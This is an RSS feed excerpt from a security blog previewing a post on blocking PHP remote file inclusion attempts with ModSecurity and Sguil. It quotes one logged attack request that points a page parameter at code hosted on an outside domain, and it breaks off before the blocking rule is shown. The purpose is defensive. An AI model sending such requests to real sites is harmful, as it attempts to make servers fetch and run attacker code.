https://inliniac.net/blog/tag/php/ Recent content in Php on Inliniac Hugo en Wed, 14 Jan 2009 23:53:08 +0000 https://inliniac.net/blog/2009/01/15/extracting-bad-urls-from-modsecurity-events-in-sguil/ Wed, 14 Jan 2009 23:53:08 +0000 https://inliniac.net/blog/2009/01/15/extracting-bad-urls-from-modsecurity-events-in-sguil/ <p>Running a PHP based blog, I see a lot of attempts to include code hosted elsewhere in requests. A long time ago I added a simple rule to block one type of the these attempts. A typical attempt looks like this:</p> <blockquote> <p>GET /blog/category/index.php?page=http://www.djrady.ru/includes/conf.txt?? HTTP/1.1</p></blockquote> <p>Notice the trailing questionmarks? Turns out these are always present, so very easy to block on. I&rsquo;m doing that for a long time now, never seen a single false positive. The rule looks like this:</p>